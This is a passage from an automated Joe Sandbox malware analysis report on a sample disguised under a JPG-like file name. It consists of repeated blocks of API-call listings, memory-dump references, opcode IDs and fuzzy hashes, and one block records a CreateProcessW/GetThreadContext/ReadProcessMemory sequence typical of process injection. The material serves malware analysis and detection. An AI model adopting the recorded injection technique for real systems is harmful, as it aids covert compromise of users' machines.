                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
                                                                                                          • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                          • Opcode Fuzzy Hash: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
                                                                                                          • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                          APIs
                                                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                          • __lock_file.LIBCMT ref: 00414A8D
                                                                                                            • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                                          • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2800547568-0
                                                                                                          • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                          • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                                          • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                                          • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                                          APIs
                                                                                                          • __lock_file.LIBCMT ref: 00415012
                                                                                                          • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2999321469-0
                                                                                                          • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                          • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                                          • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                                          • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                                          APIs
                                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03C31AA3
                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03C31B39
                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03C31B5B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2200355296.0000000003C30000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3c30000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 2438371351-0
                                                                                                          • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                          • Instruction ID: ae1fb50ba2e4ccdf7f3f5e3075e99e785d7ec00fe97b55bb6046f0aa507df681
                                                                                                          • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                          • Instruction Fuzzy Hash: C612DE24E24658C6EB24DF64D8507DEB232EF69300F1090E9910DEB7A4E77A4F81CF5A
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • _memmove.LIBCMT ref: 0046FAF1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1183979061-0
                                                                                                          • Opcode ID: 6b87ce75bb60bdd7e72fad3430ad80a29499585ed3d5991c813137c823989206
                                                                                                          • Instruction ID: 255320ec14e83fec4e4552c633d3a07f96161bd336a5b43614f928d9f0269463
                                                                                                          • Opcode Fuzzy Hash: 6b87ce75bb60bdd7e72fad3430ad80a29499585ed3d5991c813137c823989206
                                                                                                          • Instruction Fuzzy Hash: E551E6722043009BD310EF65DD82F5BB399AF89704F14492FF9859B382DB39E909C79A
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free
                                                                                                          • String ID:
                                                                                                          • API String ID: 269201875-0
                                                                                                          • Opcode ID: ddc86243868af8a552f03c0c468dbfcc8e923f466b3b61beb194f344b8570def
                                                                                                          • Instruction ID: 6b219bc4c0bbc29583a32018d9336d0aaf9d3e1b43f092b4040c7a5c6c0e764f
                                                                                                          • Opcode Fuzzy Hash: ddc86243868af8a552f03c0c468dbfcc8e923f466b3b61beb194f344b8570def
                                                                                                          • Instruction Fuzzy Hash: 18415EB4500612EBC710EF56C4C156AFBB0FF48308F2088AFE5D617355DBB9A950DB86
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: 1fe3562bb0116f9a078a3649e8bb7422149ac505db6a0aa6755b6147804fc8d3
                                                                                                          • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                                          • Opcode Fuzzy Hash: 1fe3562bb0116f9a078a3649e8bb7422149ac505db6a0aa6755b6147804fc8d3
                                                                                                          • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProtectVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 544645111-0
                                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                          • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                                          APIs
                                                                                                          • SetFilePointerEx.KERNELBASE(?,?,00002000,00000000,?,?,00002000), ref: 0040E028
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 973152223-0
                                                                                                          • Opcode ID: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
                                                                                                          • Instruction ID: 77665f5636f8aa13b7259ebce8dce40215e8c2ccffea67f4db7731d49ba0d040
                                                                                                          • Opcode Fuzzy Hash: d929dfab3d182ab311e7f976f93a7283be01245e5a1eef9e38887aa9c904d61e
                                                                                                          • Instruction Fuzzy Hash: 6C319C71B007159FCB24CF6EC88496BB7F6FB84310B14CA3EE45A93740D679E9458B54
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4104443479-0
                                                                                                          • Opcode ID: da6cf0a6a6ede84ba6bd8e84e417c60c21e62b34c0bbeb7423007b417bd32b93
                                                                                                          • Instruction ID: f795c94f21b42bfaa1f1d864c387b497e6b2772b6b59ffbe067e85bcfecebbdf
                                                                                                          • Opcode Fuzzy Hash: da6cf0a6a6ede84ba6bd8e84e417c60c21e62b34c0bbeb7423007b417bd32b93
                                                                                                          • Instruction Fuzzy Hash: 65316170600608EBEF509F12DA816AE7BF4FF45751F20C82AEC99CA611E738D590CB99
                                                                                                          APIs
                                                                                                          • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 00403962
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2738559852-0
                                                                                                          • Opcode ID: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                                                                                          • Instruction ID: 166f8584a356b396cff84430351b18548b9fac1e31d224f9c9bf96d02c5d03dd
                                                                                                          • Opcode Fuzzy Hash: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                                                                                          • Instruction Fuzzy Hash: 42111CB1200B019FD320CF55C984F27BBF8AB44711F10892ED5AA96B80D7B4FA45CBA4
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • _memmove.LIBCMT ref: 0044C1F2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1183979061-0
                                                                                                          • Opcode ID: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                                                                                          • Instruction ID: 60fa024ef6ba522ef03b0058c27b5a86e99fade8cb479355d4b2ad9ce4e818de
                                                                                                          • Opcode Fuzzy Hash: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                                                                                          • Instruction Fuzzy Hash: 25017574504640AFD321EF59C841D67B7E9EF99704B14845EF9D687702C675FC02C7A4
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 3031932315-0
                                                                                                          • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                          • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                                          • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                                          • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                                          APIs
                                                                                                          • __lock_file.LIBCMT ref: 004142F5
                                                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd_noexit__lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 2597487223-0
                                                                                                          • Opcode ID: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                                                                          • Instruction ID: 8e443c470cd329b51aa0b2c66eafbe77d500ce91655981cf057e69b52ab9faa9
                                                                                                          • Opcode Fuzzy Hash: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                                                                                          • Instruction Fuzzy Hash: 34F0C230A00219EBCF11BFB188024DF7B71EF44754F01845BF4205A151C73C8AD1EB99
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock
                                                                                                          • String ID:
                                                                                                          • API String ID: 2638373210-0
                                                                                                          • Opcode ID: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                                                                          • Instruction ID: 9e9a42c0c7b58ac35d14f3716b04d6bdbb365f426eb98045716108692e45ddfa
                                                                                                          • Opcode Fuzzy Hash: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                                                                                          • Instruction Fuzzy Hash: 82F01CB16047045FDB35CA24D941BA3B7E89B4A350F00481EFAAA87342D6B6B845CA99
                                                                                                          APIs
                                                                                                          • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0040E068
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FilePointer
                                                                                                          • String ID:
                                                                                                          • API String ID: 973152223-0
                                                                                                          • Opcode ID: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                                                                                          • Instruction ID: 8945df8720cd9eebd038067e403ceee2f4781b994f17f63e488f9437ca0746d3
                                                                                                          • Opcode Fuzzy Hash: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                                                                                          • Instruction Fuzzy Hash: ACE01275600208BFC704DFA4DC45DAE77B9E748601F008668FD01D7340D671AD5087A5
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
